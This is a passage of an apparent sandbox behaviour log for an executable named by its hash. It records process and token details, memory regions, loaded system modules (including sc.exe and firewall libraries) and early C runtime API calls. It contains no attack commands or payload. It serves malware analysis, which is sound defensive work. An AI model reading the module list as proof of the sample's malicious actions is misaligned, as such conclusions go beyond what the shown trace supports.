# Flog Txt Version 1 # Analyzer Version: 4.3.0 # Analyzer Build Date: Sep 20 2021 05:59:55 # Log Creation Date: 27.09.2021 18:00:27.138 Process: id = "1" image_name = "c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe" page_root = "0x49cfa000" os_pid = "0xe6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x640" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 118 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 119 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 120 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 121 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 122 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 123 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 124 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 125 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 126 start_va = 0x400000 end_va = 0x484fff monitored = 1 entry_point = 0x4057bd region_type = mapped_file name = "c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe") Region: id = 127 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 128 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 129 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 130 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 131 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 132 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 270 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 271 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 272 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 273 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 274 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 275 start_va = 0x590000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 276 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 277 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 278 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 279 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 280 start_va = 0x490000 end_va = 0x54dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 281 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 282 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 283 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 284 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 285 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 286 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 287 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 288 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 289 start_va = 0x76270000 end_va = 0x76361fff monitored = 0 entry_point = 0x762a8070 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 290 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 291 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 292 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 293 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 294 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 295 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 296 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 297 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 298 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 299 start_va = 0x76370000 end_va = 0x7776efff monitored = 0 entry_point = 0x7652b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 300 start_va = 0x6cb80000 end_va = 0x6cc11fff monitored = 0 entry_point = 0x6cb8dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 301 start_va = 0x77820000 end_va = 0x7789afff monitored = 0 entry_point = 0x7783e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 302 start_va = 0x75300000 end_va = 0x75336fff monitored = 0 entry_point = 0x75303b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 303 start_va = 0x74c60000 end_va = 0x75158fff monitored = 0 entry_point = 0x74e67610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 304 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 305 start_va = 0x77770000 end_va = 0x777b3fff monitored = 0 entry_point = 0x77777410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 306 start_va = 0x757f0000 end_va = 0x757fefff monitored = 0 entry_point = 0x757f2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 307 start_va = 0x777c0000 end_va = 0x7781dfff monitored = 0 entry_point = 0x777d7470 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\SysWOW64\\FirewallAPI.dll" (normalized: "c:\\windows\\syswow64\\firewallapi.dll") Region: id = 308 start_va = 0x76010000 end_va = 0x76022fff monitored = 0 entry_point = 0x76011d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 309 start_va = 0x6cb10000 end_va = 0x6cb76fff monitored = 0 entry_point = 0x6cb25a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 310 start_va = 0x70110000 end_va = 0x7011afff monitored = 0 entry_point = 0x70111d20 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 311 start_va = 0x742c0000 end_va = 0x742dafff monitored = 0 entry_point = 0x742c9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 312 start_va = 0x550000 end_va = 0x579fff monitored = 0 entry_point = 0x555680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 313 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 314 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 315 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 316 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 317 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 318 start_va = 0xb20000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 319 start_va = 0x1f20000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 320 start_va = 0x1f20000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 321 start_va = 0x20a0000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 322 start_va = 0x724c0000 end_va = 0x724ebfff monitored = 0 entry_point = 0x724d5ee0 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\SysWOW64\\fwbase.dll" (normalized: "c:\\windows\\syswow64\\fwbase.dll") Region: id = 323 start_va = 0x20b0000 end_va = 0x225ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 324 start_va = 0x1f20000 end_va = 0x201ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 325 start_va = 0x2030000 end_va = 0x203ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 326 start_va = 0x20b0000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 327 start_va = 0x2250000 end_va = 0x225ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002250000" filename = "" Region: id = 328 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 329 start_va = 0x2260000 end_va = 0x23effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 330 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 331 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 332 start_va = 0x2130000 end_va = 0x21ebfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002130000" filename = "" Region: id = 333 start_va = 0x560000 end_va = 0x563fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 334 start_va = 0x70180000 end_va = 0x7019cfff monitored = 0 entry_point = 0x70183b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 335 start_va = 0x570000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 336 start_va = 0x690000 end_va = 0x690fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 337 start_va = 0x6a0000 end_va = 0x6a4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 338 start_va = 0x6b0000 end_va = 0x6c1fff monitored = 1 entry_point = 0x6b5b30 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 339 start_va = 0x2040000 end_va = 0x207bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 340 start_va = 0x2260000 end_va = 0x235ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 341 start_va = 0x23e0000 end_va = 0x23effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 342 start_va = 0x21f0000 end_va = 0x222efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 343 start_va = 0x75160000 end_va = 0x7524afff monitored = 0 entry_point = 0x7519d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 344 start_va = 0x23f0000 end_va = 0x2480fff monitored = 0 entry_point = 0x2428cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 345 start_va = 0x6cfd0000 end_va = 0x6cfedfff monitored = 0 entry_point = 0x6cfe3080 region_type = mapped_file name = "oledlg.dll" filename = "\\Windows\\SysWOW64\\oledlg.dll" (normalized: "c:\\windows\\syswow64\\oledlg.dll") Region: id = 346 start_va = 0x76150000 end_va = 0x761e1fff monitored = 0 entry_point = 0x76188cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 347 start_va = 0x6caf0000 end_va = 0x6cb08fff monitored = 0 entry_point = 0x6caff090 region_type = mapped_file name = "olepro32.dll" filename = "\\Windows\\SysWOW64\\olepro32.dll" (normalized: "c:\\windows\\syswow64\\olepro32.dll") Region: id = 348 start_va = 0x6d0000 end_va = 0x6d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 349 start_va = 0x2360000 end_va = 0x239afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 350 start_va = 0x6e0000 end_va = 0x6e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 351 start_va = 0x10000000 end_va = 0x10002fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010000000" filename = "" Region: id = 378 start_va = 0x6f0000 end_va = 0x6f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 379 start_va = 0x2020000 end_va = 0x2020fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 380 start_va = 0x23a0000 end_va = 0x23cbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 381 start_va = 0x2080000 end_va = 0x2080fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Thread: id = 1 os_tid = 0x6a0 [0073.704] GetVersion () returned 0x23f00206 [0073.705] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2250000 [0073.763] RtlAllocateHeap (HeapHandle=0x2250000, Flags=0x0, Size=0x140) returned 0x22505a8 [0073.764] RtlAllocateHeap (HeapHandle=0x2250000, Flags=0x8, Size=0x41c4) returned 0x22506f0 [0073.764] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x4) returned 0x1f20000 [0073.764] VirtualAlloc (lpAddress=0x1f20000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x1f20000 [0073.765] GetCurrentThreadId () returned 0x6a0 [0073.765] RtlAllocateHeap (HeapHandle=0x2250000, Flags=0x0, Size=0x480) returned 0x22548c0 [0073.765] GetStartupInfoA (in: lpStartupInfo=0x19febc | out: lpStartupInfo=0x19febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0073.765] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0073.765] GetFileType (hFile=0x0) returned 0x0 [0073.766] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0073.766] GetFileType (hFile=0x0) returned 0x0 [0073.766] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0073.766] GetFileType (hFile=0x0) returned 0x0 [0073.766] SetHandleCount (uNumber=0x20) returned 0x20 [0073.766] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\c3b12369d950f2420697e8b05b80a29a0cea58fd7d858d7a622611291d3496f5.exe\" " [0073.766] GetEnvironmentStringsW () returned 0x71aeb0* [0073.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1293, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1293 [0073.766] RtlAllocateHeap (HeapHandle=0x2250000, Flags=0x0, Size=0x510) returned 0x2254d48 [0073.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1293, lpMultiByteStr=0x2254d48, cbMultiByte=1293, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1293 [0073.766] FreeEnvironmentStringsW (penv=0x71aeb0) returned 1 [0073.766] GetACP () returned 0x4e4 [0073.766] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec8 | out: lpCPInfo=0x19fec8) returned 1 [0073.766] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fea0 | out: lpCPInfo=0x19fea0) returned 1 [0073.766] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0073.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0073.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f744, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㎌CĀ") returned 256 [0073.766] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㎌CĀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0073.766] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0073.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0073.766] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f720, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㎌CĀ") returned 256 [0073.766] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 